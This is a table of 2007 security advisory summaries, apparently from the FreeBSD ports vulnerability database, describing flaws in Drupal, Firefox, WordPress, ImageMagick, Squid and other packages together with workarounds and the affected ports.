| 2007-10-24 | The Drupal Project reports: In some circumstances Drupal allows user-supplied data to become part of response headers. As this user-supplied data is not always properly escaped, this can be exploited by malicious users to execute HTTP response splitting attacks which may lead to a variety of issues, among them cache poisoning, cross-user defacement and injection of arbitrary code. The Drupal installer allows any visitor to provide credentials for a database when the site's own database is not reachable. This allows attackers to run arbitrary code on the site's server. An immediate workaround is the removal of the file install.php in the Drupal root directory. The allowed extension list of the core Upload module contains the extension HTML by default. Such files can be used to execute arbitrary script code in the context of the affected site when a user views the file. Revoking upload permissions or removing the .html extension from the allowed extension list will stop uploads of malicious files. but will do nothing to protect your site againstfiles that are already present. Carefully inspect the file system path for any HTML files. We recommend you remove any HTML file you did not update yourself. You should look for , CSS includes, Javascript includes, and onerror="" attributes if you need to review files individually. The Drupal Forms API protects against cross site request forgeries (CSRF), where a malicous site can cause a user to unintentionally submit a form to a site where he is authenticated. The user deletion form does not follow the standard Forms API submission model and is therefore not protected against this type of attack. A CSRF attack may result in the deletion of users. The publication status of comments is not passed during the hook_comments API operation, causing various modules that rely on the publication status (such as Organic groups, or Subscriptions) to mail out unpublished comments. more... | drupal4 drupal5 |
| 2007-10-23 | Ganael Laplanche reports: Up to now, each ldap* command was called with the -w parameter, which allows to specify the bind password on the command line. Unfortunately, this could make the password appear to anybody performing a `ps` during the call. This is now avoided by using the -y parameter and a password file. more... | ldapscripts |
| 2007-10-23* | RedHat reports: Several flaws were found in the way in which Firefox displayed malformed web content. A web page containing specially-crafted content could potentially trick a user into surrendering sensitive information. (CVE-2007-1095, CVE-2007-3844, CVE-2007-3511, CVE-2007-5334) more... | firefox linux-firefox linux-seamonkey seamonkey |
| 2007-10-20* | SecurityFocus reports: phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks. more... | phpMyAdmin |
| 2007-10-16* | phpmyadmin Site reports: It was possible to craft a request that contains XSS by attacking the "table" parameter. more... | phpMyAdmin |
| 2007-10-11 | A Secunia Advisory reports: The vulnerability is caused due to a boundary error within the redir() function in check_http.c when processing HTTP Location: header information. This can be exploited to cause a buffer overflow by returning an overly long string in the "Location:" header to a vulnerable system. more... | nagios-plugins |
| 2007-10-11 | A Secunia Advisory reports: Some vulnerabilities have been reported in libpng, which can be exploited by malicious people to cause a DoS (Denial of Service). Certain errors within libpng, including a logical NOT instead of a bitwise NOT in pngtrtran.c, an error in the 16bit cheap transparency extension, and an incorrect use of sizeof() may be exploited to crash an application using the library. Various out-of-bounds read errors exist within the functions png_handle_pCAL(), png_handle_sCAL(), png_push_read_tEXt(), png_handle_iTXt(), and png_handle_ztXt(), which may be exploited by exploited to crash an application using the library. The vulnerability is caused due to an off-by-one error within the ICC profile chunk handling, which potentially can be exploited to crash an application using the library. more... | png |
| 2007-10-10 | Multiple vulnerabilities have been discovered in ImageMagick. ImageMagick before 6.3.5-9 allows context-dependent attackers to cause a denial of service via a crafted image file that triggers (1) an infinite loop in the ReadDCMImage function, related to ReadBlobByte function calls; or (2) an infinite loop in the ReadXCFImage function, related to ReadBlobMSBLong function calls. Multiple integer overflows in ImageMagick before 6.3.5-9 allow context-dependent attackers to execute arbitrary code via a crafted (1) .dcm, (2) .dib, (3) .xbm, (4) .xcf, or (5) .xwd image file, which triggers a heap-based buffer overflow. Off-by-one error in the ReadBlobString function in blob.c in ImageMagick before 6.3.5-9 allows context-dependent attackers to execute arbitrary code via a crafted image file, which triggers the writing of a '\0' character to an out-of-bounds address. Sign extension error in the ReadDIBImage function in ImageMagick before 6.3.5-9 allows context-dependent attackers to execute arbitrary code via a crafted width value in an image file, which triggers an integer overflow and a heap-based buffer overflow. more... | ImageMagick ImageMagick-nox11 |
| 2007-10-10* | The MediaWiki development team reports: A possible HTML/XSS injection vector in the API pretty-printing mode has been found and fixed. The vulnerability may be worked around in an unfixed version by simply disabling the API interface if it is not in use, by adding this to LocalSettings.php: $wgEnableAPI = false; (This is the default setting in 1.8.x.) more... | mediawiki |
| 2007-10-08 | Matthieu Herrb reports: Problem Description: Several vulnerabilities have been identified in xfs, the X font server. The QueryXBitmaps and QueryXExtents protocol requests suffer from lack of validation of their 'length' parameters. Impact: On most modern systems, the font server is accessible only for local clients and runs with reduced privileges, but on some systems it may still be accessible from remote clients and possibly running with root privileges, creating an opportunity for remote privilege escalation. more... | xfs |
| 2007-10-04 | RISE Security reports: There exists multiple vulnerabilities within functions of Firebird Relational Database, which when properly exploited can lead to remote compromise of the vulnerable system. more... | firebird-server |
| 2007-10-02* | The Bugzilla development team reports: Bugzilla::WebService::User::offer_account_by_email does not check the "createemailregexp" parameter, and thus allows users to create accounts who would normally be denied account creation. The "emailregexp" parameter is still checked. If you do not have the SOAP::Lite Perl module installed on your Bugzilla system, your system is not vulnerable (because the Bugzilla WebService will not be enabled). more... | bugzilla |
| 2007-10-01* | Debian Bug report log reports: When tagging file $foo, a temporary copy of the file is created, and for some reason, libid3 doesn't use mkstemp but just creates $foo.XXXXXX literally, without any checking. This would silently truncate and overwrite an existing $foo.XXXXXX. more... | id3lib |
| 2007-09-21 | Alexander Concha reports: While testing WordPress, it has been discovered a SQL Injection vulnerability that allows an attacker to retrieve remotely any user credentials from a vulnerable site, this bug is caused because of early database escaping and the lack of validation in query string like parameters. more... | de-wordpress wordpress wordpress-mu zh-wordpress |
| 2007-09-21 | A Bugzilla Security Advisory reports: This advisory covers three security issues that have recently been fixed in the Bugzilla code: A possible cross-site scripting (XSS) vulnerability when filing bugs using the guided form. When using email_in.pl, insufficiently escaped data may be passed to sendmail. Users using the WebService interface may access Bugzilla's time-tracking fields even if they normally cannot see them. We strongly advise that 2.20.x and 2.22.x users should upgrade to 2.20.5 and 2.22.3 respectively. 3.0 users, and users of 2.18.x or below, should upgrade to 3.0.1. more... | bugzilla ja-bugzilla |
| 2007-09-21 | BugTraq reports: ClamAV is prone to multiple denial-of-service vulnerabilities. A successful attack may allow an attacker to crash the application and deny service to users. more... | clamav |
| 2007-09-20 | The coppermine development team reports two vulnerabilities with the coppermine application. These vulnerabilities are caused by improper checking of the log variable in "viewlog.php" and improper checking of the referer variable in "mode.php". This could allow local file inclusion, potentially disclosing valuable information and could lead to an attacker conducting a cross site scripting attack against the targeted site. more... | coppermine |
| 2007-09-20 | iDefense reports: Remote exploitation of multiple integer overflow vulnerabilities within OpenOffice, as included in various vendors' operating system distributions, allows attackers to execute arbitrary code. These vulnerabilities exist within the TIFF parsing code of the OpenOffice suite. When parsing the TIFF directory entries for certain tags, the parser uses untrusted values from the file to calculate the amount of memory to allocate. By providing specially crafted values, an integer overflow occurs in this calculation. This results in the allocation of a buffer of insufficient size, which in turn leads to a heap overflow. more... | openoffice |
| 2007-09-19 | The KDE development team reports: The Konqueror address bar is vulnerable to spoofing attacks that are based on embedding white spaces in the url. In addition the address bar could be tricked to show an URL which it is intending to visit for a short amount of time instead of the current URL. more... | kdebase3 kdelibs3 |
| 2007-09-19 | The KDE development team reports: KDM can be tricked into performing a password-less login even for accounts with a password set under certain circumstances, namely autologin to be configured and "shutdown with password" enabled. more... | kdebase3 |
| 2007-09-19 | The Flyspray Project reports: Flyspray authentication system can be bypassed by sending a carefully crafted post request. To be vulnerable, PHP configuration directive output_buffering has to be disabled or set to a low value. more... | flyspray |
| 2007-09-11 | Apache HTTP server project reports: The following potential security flaws are addressed: CVE-2007-3847: mod_proxy: Prevent reading past the end of a buffer when parsing date-related headers. CVE-2007-1863: mod_cache: Prevent a segmentation fault if attributes are listed in a Cache-Control header without any value. CVE-2007-3304: prefork, worker, event MPMs: Ensure that the parent process cannot be forced to kill processes outside its process group. CVE-2006-5752: mod_status: Fix a possible XSS attack against a site with a public server-status page and ExtendedStatus enabled, for browsers which perform charset "detection". Reported by Stefan Esser. CVE-2006-1862: mod_mem_cache: Copy headers into longer lived storage; header names and values could previously point to cleaned up storage. more... | apache |
| 2007-09-10 | lighttpd maintainer reports: Lighttpd is prone to a header overflow when using the mod_fastcgi extension, this can lead to arbitrary code execution in the fastcgi application. For a detailed description of the bug see the external reference. This bug was found by Mattias Bengtsson and Philip Olausson more... | lighttpd |
| 2007-09-05 | Gentoo reports: Sune Kloppenborg Jeppesen and Tavis Ormandy of the Gentoo Linux Security Team have reported that the check_update.sh script and the main rkhunter script insecurely creates several temporary files with predictable filenames. A local attacker could create symbolic links in the temporary files directory, pointing to a valid file somewhere on the filesystem. When rkhunter or the check_update.sh script runs, this would result in the file being overwritten with the rights of the user running the utility, which could be the root user. more... | rkhunter |
| 2007-09-02 | Matthias Andree reports: fetchmail will generate warning messages in certain circumstances (for instance, when leaving oversized messages on the server or login to the upstream fails) and send them to the local postmaster or the user running it. If this warning message is then refused by the SMTP listener that fetchmail is forwarding the message to, fetchmail crashes and does not collect further messages until it is restarted. more... | fetchmail |
| 2007-09-01 | Red Hat reports: A path traversal flaw was discovered in the way GNU tar extracted archives. A malicious user could create a tar archive that could write to arbitrary files to which the user running GNU tar had write access. Red Hat credits Dmitry V. Levin for reporting the issue. more... | gtar |
| 2007-08-28* | A Secunia Advisory reports: A format string error in the "inc_put_error()" function in src/inc.c when displaying a POP3 server's error response can be exploited via specially crafted POP3 server replies containing format specifiers. Successful exploitation may allow execution of arbitrary code, but requires that the user is tricked into connecting to a malicious POP3 server. more... | claws-mail sylpheed-claws sylpheed2 |
| 2007-08-25* | An advisory from Opera reports: A specially crafted JavaScript can make Opera execute arbitrary code. more... | linux-opera opera opera-devel |
| 2007-08-23* | BugTraq reports: The rsync utility is prone to an off-by-one buffer-overflow vulnerability. This issue is due to a failure of the application to properly bounds-check user-supplied input. Successfully exploiting this issue may allow arbitrary code-execution in the context of the affected utility. more... | rsync |
| 2007-08-16* | Blogsecurity reports: An attacker can read comments on posts that have not been moderated. This can be a real security risk if blog admins are using unmoderated comments (comments that have not been made public) to hide sensitive notes regarding posts, future work, passwords etc. So please be careful if you are one of these blog admins. more... | de-wordpress wordpress zh-wordpress |
| 2007-08-10* | isecpartners reports: flac123, also known as flac-tools, is vulnerable to a buffer overflow in vorbis comment parsing. This allows for the execution of arbitrary code. more... | flac123 |
| 2007-08-02 | A Secunia Advisory reports: fsplib can be exploited to compromise an application using the library. A boundary error exists in the processing of file names in fsp_readdir_native, which can be exploited to cause a stack-based buffer overflow if the defined MAXNAMLEN is bigger than 256. A boundary error exists in the processing of directory entries in fsp_readdir, which can be exploited to cause a stack-based buffer overflow on systems with an insufficient size allocated for the d_name field of directory entries. more... | fsplib |
| 2007-08-02 | A Secunia Advisory reports: joomla can be exploited to conduct session fixation attacks, cross-site scripting attacks or HTTP response splitting attacks. Certain unspecified input passed in com_search, com_content and mod_login is not properly sanitised before being returned to a user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Input passed to the url parameter is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which will be included in a response sent to the user, allowing for execution of arbitrary HTML and script code in a user's browser session in context of an affected site. An error exists in the handling of sessions and can be exploited to hijack another user's session by tricking the user into logging in after following a specially crafted link. more... | joomla |
| 2007-08-02 | Problem Description: An un-checked return value in the BGP dissector code can result in an integer overflow. This value is used in subsequent buffer management operations, resulting in a stack based buffer overflow under certain circumstances. Impact: By crafting malicious BGP packets, an attacker could exploit this vulnerability to execute code or crash the tcpdump process on the target system. This code would be executed in the context of the user running tcpdump(1). It should be noted that tcpdump(1) requires privileges in order to open live network interfaces. Workaround: No workaround is available. more... | tcpdump |
| 2007-08-02 | Problem Description: When named(8) is operating as a recursive DNS server or sending NOTIFY requests to slave DNS servers, named(8) uses a predictable query id. Impact: An attacker who can see the query id for some request(s) sent by named(8) is likely to be able to perform DNS cache poisoning by predicting the query id for other request(s). Workaround: No workaround is available. more... | named |
| 2007-08-02* | Problem Description: When writing data into a buffer in the file_printf function, the length of the unused portion of the buffer is not correctly tracked, resulting in a buffer overflow when processing certain files. Impact: An attacker who can cause file(1) to be run on a maliciously constructed input can cause file(1) to crash. It may be possible for such an attacker to execute arbitrary code with the privileges of the user running file(1). The above also applies to any other applications using the libmagic(3) library. Workaround: No workaround is available, but systems where file(1) and other libmagic(3)-using applications are never run on untrusted input are not vulnerable. more... | file |
| 2007-08-01* | Doz reports: A Input passed in the URL to index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | phpSysInfo |
| 2007-07-29 | Securityfocus reports: Mutt is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation. An attacker can exploit this issue to execute arbitrary code with the with the privileges of the victim. Failed exploit attempts will result in a denial of service. more... | ja-mutt mutt mutt-lite zh-mutt |
| 2007-07-28 | A Secunia Advisory reports: An error exists in the handling of DNS queries where IDs are incremented with a fixed value and are additionally used for child processes in a forking server. This can be exploited to poison the DNS cache of an application using the module if a valid ID is guessed. An error in the PP implementation within the "dn_expand()" function can be exploited to cause a stack overflow due to an endless loop via a specially crafted DNS packet. more... | p5-Net-DNS |
| 2007-07-28 | The Drupal Project reports: Several parts in Drupal core are not protected against cross site request forgeries due to inproper use of the Forms API, or by taking action solely on GET requests. Malicious users are able to delete comments and content revisions and disable menu items by enticing a privileged users to visit certain URLs while the victim is logged-in to the targeted site. more... | drupal5 |
| 2007-07-28 | The Drupal Project reports: Some server variables are not escaped consistently. When a malicious user is able to entice a victim to visit a specially crafted link or webpage, arbitrary HTML and script code can be injected and executed in the context of the victim's session on the targeted website. Custom content type names are not escaped consistently. A malicious user with the 'administer content types' permission would be able to inject and execute arbitrary HTML and script code on the website. Revoking the 'administer content types' permission provides an immediate workaround. more... | drupal4 drupal5 |
| 2007-07-27 | A Secunia Advisory reports: A format string error in the "helptags_one()" function in src/ex_cmds.c when running the "helptags" command can be exploited to execute arbitrary code via specially crafted help files. more... | vim vim-lite vim-ruby vim6 vim6-ruby |
| 2007-07-26 | isecpartners reports: libvorbis contains several vulnerabilities allowing heap overwrite, read violations and a function pointer overwrite. These bugs cause a at least a denial of service, and potentially code execution. more... | libvorbis |
| 2007-07-24 | The Apache Project reports: The JSP and Servlet included in the sample application within the Tomcat documentation webapp did not escape user provided data before including it in the output. This enabled a XSS attack. These pages have been simplified not to use any user provided data in the output. more... | apache-tomcat jakarta-tomcat tomcat |
| 2007-07-24 | Apache Project reports: The Apache Tomcat team is proud to announce the immediate availability of Tomcat 4.1.36 stable. This build contains numerous library updates, A small number of bug fixes and two important security fixes. more... | apache-tomcat jakarta-tomcat tomcat |
| 2007-07-24 | DokuWiki reports: The spellchecker tests the UTF-8 capabilities of the used browser by sending an UTF-8 string to the backend, which will send it back unfiltered. By comparing string length the spellchecker can work around broken implementations. An attacker could construct a form to let users send JavaScript to the spellchecker backend, resulting in malicious JavaScript being executed in their browser. Affected are all versions up to and including 2007-06-26 even when the spell checker is disabled. more... | dokuwiki dokuwiki-devel |
| 2007-07-21 | Secunia Advisory reports: Some vulnerabilities have been reported in lighttpd, which can be exploited by malicious people to bypass certain security restrictions or cause a DoS (Denial of Service). more... | lighttpd |
| 2007-07-19 | Opera Software ASA reports of multiple security fixes in Opera, including an arbitrary code execute vulnerability: Opera for Linux, FreeBSD, and Solaris has a flaw in the createPattern function that leaves old data that was in the memory before Opera allocated it in the new pattern. The pattern can be read and analyzed by JavaScript, so an attacker can get random samples of the user's memory, which may contain data. Removing a specially crafted torrent from the download manager can crash Opera. The crash is caused by an erroneous memory access. An attacker needs to entice the user to accept the malicious BitTorrent download, and later remove it from Opera's download manager. To inject code, additional means will have to be employed. Users clicking a BitTorrent link and rejecting the download are not affected. data: URLs embed data inside them, instead of linking to an external resource. Opera can mistakenly display the end of a data URL instead of the beginning. This allows an attacker to spoof the URL of a trusted site. Opera's HTTP authentication dialog is displayed when the user enters a Web page that requires a login name and a password. To inform the user which server it was that asked for login credentials, the dialog displays the server name. The user has to see the entire server name. A truncated name can be misleading. Opera's authentication dialog cuts off the long server names at the right hand side, adding an ellipsis (...) to indicate that it has been cut off. The dialog has a predictable size, allowing an attacker to create a server name which will look almost like a trusted site, because the real domain name has been cut off. The three dots at the end will not be obvious to all users. This flaw can be exploited by phishers who can set up custom sub-domains, for example by hosting their own public DNS. more... | linux-opera opera opera-devel |
| 2007-07-18 | Adobe reports: Critical vulnerabilities have been identified in Adobe Flash Player that could allow an attacker who successfully exploits these potential vulnerabilities to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit these potential vulnerabilities. more... | linux-flashplugin |
| 2007-07-09* | Debian reports: Ulf Härnhammar from the Debian Security Audit Project discovered a problem in typespeed, a touch-typist trainer disguised as game. This could lead to a local attacker executing arbitrary code. more... | typespeed |
| 2007-07-07* | wireshark Team reports: It may be possible to make Wireshark or Ethereal crash or use up available memory by injecting a purposefully malformed packet onto the wire or by convincing someone to read a malformed packet trace file. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2007-06-29 | gd had been reported vulnerable to several vulnerabilities: CVE-2007-3472: Integer overflow in gdImageCreateTrueColor function in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers has unspecified attack vectors and impact. CVE-2007-3473: The gdImageCreateXbm function in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash) via unspecified vectors involving a gdImageCreate failure. CVE-2007-3474: Multiple unspecified vulnerabilities in the GIF reader in the GD Graphics Library (libgd) before 2.0.35 allow user-assisted remote attackers to have unspecified attack vectors and impact. CVE-2007-3475: The GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash) via a GIF image that has no global color map. CVE-2007-3476: Array index error in gd_gif_in.c in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash and heap corruption) via large color index values in crafted image data, which results in a segmentation fault. CVE-2007-3477: The (a) imagearc and (b) imagefilledarc functions in GD Graphics Library (libgd) before 2.0.35 allows attackers to cause a denial of service (CPU consumption) via a large (1) start or (2) end angle degree value. CVE-2007-3478: Race condition in gdImageStringFTEx (gdft_draw_bitmap) in gdft.c in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash) via unspecified vectors, possibly involving truetype font (TTF) support. more... | gd |
| 2007-06-28* | Debian project reports: It was discovered that the IMAP code in the Evolution Data Server performs insufficient sanitising of a value later used an array index, which can lead to the execution of arbitrary code. more... | evolution-data-server |
| 2007-06-27* | Mandriva reports: PerlRun.pm in Apache mod_perl 1.29 and earlier, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI. more... | mod_perl mod_perl2 |
| 2007-06-24* | Secunia reports: Slappter has discovered a vulnerability in WordPress, which can be exploited by malicious users to conduct SQL injection attacks. Input passed to the "wp.suggestCategories" method in xmlrpc.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows e.g. retrieving usernames and password hashes, but requires valid user credentials and knowledge of the database table prefix. more... | de-wordpress wordpress zh-wordpress |
| 2007-06-21 | Debian Project reports: Erik Sjolund discovered a buffer overflow in pcdsvgaview, an SVGA PhotoCD viewer. xpcd-svga is part of xpcd and uses svgalib to display graphics on the Linux console for which root permissions are required. A malicious user could overflow a fixed-size buffer and may cause the program to execute arbitrary code with elevated privileges. more... | xpcd |
| 2007-06-19 | Clamav had been found vulnerable to multiple vulnerabilities: Improper checking for the end of an buffer causing an unspecified attack vector. Insecure temporary file handling, which could be exploited to read sensitive information. A flaw in the parser engine which could allow a remote attacker to bypass the scanning of RAR files. A flaw in libclamav/unrar.c which could cause a remote Denial of Service (DoS) by sending a specially crafted RAR file with a modified vm_codesize. A flaw in the OLE2 parser which could cause a remote Denial of Service (DoS). more... | clamav |
| 2007-06-18 | isecpartners reports: VLC is vulnerable to a format string attack in the parsing of Vorbis comments in Ogg Vorbis and Ogg Theora files, CDDA data or SAP/SDP service discovery messages. Additionally, there are two errors in the handling of wav files, one a denial of service due to an uninitialized variable, and one integer overflow in sampling frequency calculations. more... | vlc |
| 2007-06-18 | SpamAssassin website reports: A local user symlink-attack DoS vulnerability in SpamAssassin has been found, affecting versions 3.1.x, 3.2.0, and SVN trunk. more... | p5-Mail-SpamAssassin |
| 2007-06-12 | Secunia reports: CUPS is not using multiple workers to handle connections. This can be exploited to stop CUPS from accepting new connections by starting but never completing an SSL negotiation. more... | cups-base |
| 2007-06-09 | Secunia reports: Input passed to unspecified parameters in pam_login.cgi is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | webmin |
| 2007-06-07 | Mplayer Team reports: A stack overflow was found in the code used to handle cddb queries. When copying the album title and category, no checking was performed on the size of the strings before storing them in a fixed-size array. A malicious entry in the database could trigger a stack overflow in the program, leading to arbitrary code execution with the uid of the user running MPlayer. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2007-06-05* | Problem Description Multiple programming errors have been found in gzip which can be triggered when gzip is decompressing files. These errors include insufficient bounds checks in buffer use, a NULL pointer dereference, and a potential infinite loop. Impact The insufficient bounds checks in buffer use can cause gzip to crash, and may permit the execution of arbitrary code. The NULL pointer deference can cause gzip to crash. The infinite loop can cause a Denial-of-Service situation where gzip uses all available CPU time. Workaround No workaround is available. more... | gzip |
| 2007-06-04 | Olivier Dobberkau, Andreas Otto, and Thorsten Kahler report: An unspecified error in the internal form engine can be used for sending arbitrary mail headers, using it for purposes which it is not meant for, e.g. sending spam messages. more... | typo3 |
| 2007-06-04 | SecurityFocus reports about phppgadmin: Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. more... | phppgadmin |
| 2007-06-01 | James Youngman reports: When GNU locate reads filenames from an old-format locate database, they are read into a fixed-length buffer allocated on the heap. Filenames longer than the 1026-byte buffer can cause a buffer overrun. The overrunning data can be chosen by any person able to control the names of filenames created on the local system. This will normally include all local users, but in many cases also remote users (for example in the case of FTP servers allowing uploads). more... | findutils |
| 2007-05-24 | Integer signedness error in truetype/ttgload.c in Freetype 2.3.4 and earlier might allow remote attackers to execute arbitrary code via a crafted TTF image with a negative n_points value, which leads to an integer overflow and heap-based buffer overflow. more... | freetype2 |
| 2007-05-21 | The SquirrelMail developers report: Multiple cross-site scripting (XSS) vulnerabilities in the HTML filter in SquirrelMail 1.4.0 through 1.4.9a allow remote attackers to inject arbitrary web script or HTML via the (1) data: URI in an HTML e-mail attachment or (2) various non-ASCII character sets that are not properly filtered when viewed with Microsoft Internet Explorer. more... | squirrelmail |
| 2007-05-16 | A Libpng Security Advisory reports: A grayscale PNG image with a malformed (bad CRC) tRNS chunk will crash some libpng applications. This vulnerability could be used to crash a browser when a user tries to view such a malformed PNG file. It is not known whether the vulnerability could be exploited otherwise. more... | png |
| 2007-05-10* | The PHP development team reports: Security Enhancements and Fixes in PHP 5.2.2 and PHP 4.4.7: Fixed CVE-2007-1001, GD wbmp used with invalid image size Fixed asciiz byte truncation inside mail() Fixed a bug in mb_parse_str() that can be used to activate register_globals Fixed unallocated memory access/double free in in array_user_key_compare() Fixed a double free inside session_regenerate_id() Added missing open_basedir & safe_mode checks to zip:// and bzip:// wrappers. Limit nesting level of input variables with max_input_nesting_level as fix for. Fixed CRLF injection inside ftp_putcmd(). Fixed a possible super-global overwrite inside import_request_variables(). Fixed a remotely trigger-able buffer overflow inside bundled libxmlrpc library. Security Enhancements and Fixes in PHP 5.2.2 only: Fixed a header injection via Subject and To parameters to the mail() function Fixed wrong length calculation in unserialize S type. Fixed substr_compare and substr_count information leak. Fixed a remotely trigger-able buffer overflow inside make_http_soap_request(). Fixed a buffer overflow inside user_filter_factory_create(). Security Enhancements and Fixes in PHP 4.4.7 only: XSS in phpinfo() more... | mod_php mod_php4 mod_php4-twig mod_php5 php4 php4-cgi php4-cli php4-dtc php4-horde php4-nms php4-odbc php4-session php4-shmop php4-wddx php5 php5-cgi php5-cli php5-dtc php5-horde php5-imap php5-nms php5-odbc php5-session php5-shmop php5-sqlite php5-wddx |
| 2007-05-02* | The Debian Security Team reports: Several vulnerabilities have been discovered in the QEMU processor emulator, which may lead to the execution of arbitrary code or denial of service. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-1320Tavis Ormandy discovered that a memory management routine of the Cirrus video driver performs insufficient bounds checking, which might allow the execution of arbitrary code through a heap overflow. CVE-2007-1321Tavis Ormandy discovered that the NE2000 network driver and the socket code perform insufficient input validation, which might allow the execution of arbitrary code through a heap overflow. CVE-2007-1322Tavis Ormandy discovered that the "icebp" instruction can be abused to terminate the emulation, resulting in denial of service. CVE-2007-1323Tavis Ormandy discovered that the NE2000 network driver and the socket code perform insufficient input validation, which might allow the execution of arbitrary code through a heap overflow. CVE-2007-1366Tavis Ormandy discovered that the "aam" instruction can be abused to crash qemu through a division by zero, resulting in denial of service. more... | qemu qemu-devel |
| 2007-05-02* | Imager 0.56 and all earlier versions with BMP support have a security issue when reading compressed 8-bit per pixel BMP files where either a compressed run of data or a literal run of data overflows the scan-line. Such an overflow causes a buffer overflow in a malloc() allocated memory buffer, possibly corrupting the memory arena headers. The effect depends on your system memory allocator, with glibc this typically results in an abort, but with other memory allocators it may be possible to cause local code execution. more... | p5-Imager |
| 2007-04-23* | Serge Mister and Robert Zuccherato reports that the OpenPGP protocol is vulnerable to a cryptographic attack when using symmetric encryption in an automated way. David Shaw reports about the impact: This attack, while very significant from a cryptographic point of view, is not generally effective in the real world. To be specific, unless you have your OpenPGP program set up as part of an automated system to accept encrypted messages, decrypt them, and then provide a response to the submitter, then this does not affect you at all. Note that the fix in GnuPG does note completely eliminate the potential problem: These patches disable a portion of the OpenPGP protocol that the attack is exploiting. This change should not be user visible. With the patch in place, this attack will not work using a public-key encrypted message. It will still work using a passphrase-encrypted message. more... | gnupg p5-Crypt-OpenPGP pgp |
| 2007-04-19 | CVE reports: The APOP protocol allows remote attackers to guess the first 3 characters of a password via man-in-the-middle (MITM) attacks that use crafted message IDs and MD5 collisions. more... | claws-mail |
| 2007-04-19* | The Mozilla Foundation reports of multiple security issues in Firefox, Seamonkey, and Thunderbird. Several of these issues can probably be used to run arbitrary code with the privilege of the user running the program. MFSA 2007-08 onUnload + document.write() memory corruption MFSA 2007-07 Embedded nulls in location.hostname confuse same-domain checks MFSA 2007-06 Mozilla Network Security Services (NSS) SSLv2 buffer overflow MFSA 2007-05 XSS and local file access by opening blocked popups MFSA 2007-04 Spoofing using custom cursor and CSS3 hotspot MFSA 2007-03 Information disclosure through cache collisions MFSA 2007-02 Improvements to help protect against Cross-Site Scripting attacks MFSA 2007-01 Crashes with evidence of memory corruption (rv:1.8.0.10/1.8.1.2) more... | firefox firefox-ja lightning linux-firefox linux-firefox-devel linux-mozilla linux-mozilla-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird mozilla mozilla-thunderbird seamonkey thunderbird |
| 2007-04-14 | Lighttpd SA: Lighttpd caches the rendered string for mtime. The cache key has as a default value 0. At that point the pointer to the string are still NULL. If a file with an mtime of 0 is requested it tries to access the pointer and crashes. The bug requires that a malicious user can either upload files or manipulate the mtime of the files. The bug was reported by cubiq and fixed by Marcus Rueckert. more... | lighttpd |
| 2007-04-14 | Lighttpd SA: If the connection aborts during parsing "\r\n\r\n" the server might get into a infinite loop and use 100% of the CPU time. lighttpd still responses to other requests. This can be repeated until either the server limit for concurrent connections or file descriptors is reached. The bug was reported and fixed by Robert Jakabosky. more... | lighttpd |
| 2007-04-13 | The freeradius development team reports: A malicous 802.1x supplicant could send malformed Diameter format attributes inside of an EAP-TTLS tunnel. The server would reject the authentication request, but would leak one VALUE_PAIR data structure, of approximately 300 bytes. If an attacker performed the attack many times (e.g. thousands or more over a period of minutes to hours), the server could leak megabytes of memory, potentially leading to an "out of memory" condition, and early process exit. more... | freeradius freeradius-mysql |
| 2007-04-13* | JAAScois reports: While processing KML/KMZ data Google Earth fails to verify its size prior to copying it into a fixed-sized buffer. This can be exploited as a buffer-overflow vulnerability to cause the application to crash and/or to execute arbitrary code. more... | google-earth |
| 2007-04-09 | Matthias Andree reports: The POP3 standard, currently RFC-1939, has specified an optional, MD5-based authentication scheme called "APOP" which no longer should be considered secure. Additionally, fetchmail's POP3 client implementation has been validating the APOP challenge too lightly and accepted random garbage as a POP3 server's APOP challenge. This made it easier than necessary for man-in-the-middle attackers to retrieve by several probing and guessing the first three characters of the APOP secret, bringing brute forcing the remaining characters well within reach. more... | fetchmail |
| 2007-04-08 | CVE reports: Buffer overflow in eject.c in Jason W. Bacon mcweject 0.9 on FreeBSD, and possibly other versions, allows local users to execute arbitrary code via a long command line argument, possibly involving the device name. more... | mcweject |
| 2007-04-08 | Secunia reports: A vulnerability has been discovered in WebCalendar, which can be exploited by malicious people to compromise a vulnerable system. Input passed to unspecified parameters is not properly verified before being used with the "noSet" parameter set. This can be exploited to overwrite certain variables, and allows e.g. the inclusion of arbitrary PHP files from internal or external resources. more... | WebCalendar |
| 2007-03-21* | Squid advisory 2007:1 notes: Due to an internal error Squid-2.6 is vulnerable to a denial of service attack when processing the TRACE request method. Workarounds: To work around the problem deny access to using the TRACE method by inserting the following two lines before your first http_access rule. acl TRACE method TRACE http_access deny TRACE more... | squid |
